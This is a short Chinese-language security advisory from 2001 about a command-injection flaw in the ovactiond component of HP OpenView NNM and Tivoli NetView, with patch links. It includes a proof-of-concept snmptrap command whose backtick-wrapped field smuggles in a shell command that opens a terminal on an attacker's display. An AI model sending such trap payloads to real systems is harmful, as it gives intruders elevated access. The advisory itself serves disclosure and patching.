OpenView and NetView存在严重漏洞发布时间:2001-08-18 更新时间:2001-08-18 严重程度:高 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式 受影响系统 HP OpenView Network Node Manager (NNM) Version 6.1-详细描述 ovactiond 是大型管理网络和系统的软件openview的一个组件,是用于openview和netview处理SNMP trap和事件处理器的工具,其中存在一个严重漏洞可以导致攻击者获得权限的提升。 在 UNIX 系统上,ovactind 是以 bin 身份运行的,攻击者取得 bin权利后,有可能进一步取得 root 特权。在 WINDOWS 系统上,ovactind 是以 Local System 身份运行的。 问题出在trapd.conf 中的下列定义中: # EVENT OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000 0208 "Configuration Alarms" Warning FORMAT Generic NNM to MgX message. $12 EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10 1.3.[snip...] # 用户提供的数据会被交给EXEC去执行。 测试代码 snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s "" 解决方案 下载安装补丁: HP http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985 http://www.kb.cert.org/vuls/id/952171 Tivoli http://www.tivoli.com/support/ 相关信息 |
